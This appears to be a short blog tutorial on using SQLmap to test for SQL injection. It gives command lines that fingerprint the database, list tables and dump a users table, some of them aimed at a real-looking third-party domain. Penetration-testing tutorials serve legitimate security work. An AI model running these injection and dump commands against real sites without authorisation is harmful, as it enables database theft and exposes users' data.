How to Use SQLmap to Test for SQL Injection Vulnerability | Full Tutorial
In this post, we discussed and explained one of the most popular tools used for database security testing, that is, SQLmap. SQLmap is used to conduct security assessments for databases to check if the database is vulnerable to SQL Injection attacks.
Please watch the video at the bottom for full detailed explanation of the walkthrough.
What is SQLmap
An open-source penetration testing tool called sqlmap makes it easier to find and take advantage of SQL injection vulnerabilities to take control of database servers. It has a strong detection engine, a ton of specialized features for the ultimate penetration tester, and a wide range of switches, such as those for database fingerprinting, retrieving data from databases, accessing the underlying file system, and using out-of-band connections to run commands on the operating system.
SQLmap Use Cases in Database Security
- SQL Injection Vulnerability
- General Database Security Settings.
SQLmap Usage
You can install sqlmap by executing the below commands:
attacker@attacker:~$ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-devTo get a list of basic options and switches use:
python sqlmap.py -hTo get a list of all options and switches use:
python sqlmap.py -hhYou can find a sample run here. To get an overview of sqlmap capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the user’s manual.
Example use cases of SQLmap to test the security of databases
Grabbing the Database software
root@kali: sqlmap -u example.com/product/14* --bannerWe put star as the vulnerable parameter is not clear to us
or
root@kali:sqlmap -r req.txt --current-dbListing Tables
root@kali: sqlmap -u catalog.sph-assets.com/product/14* --tablesor
root@kali:sqlmap -r request.txt -D social --tablesDump entries from a specific table
root@kali: sqlmap -u example.com/product/14* -T users_field_data –dump
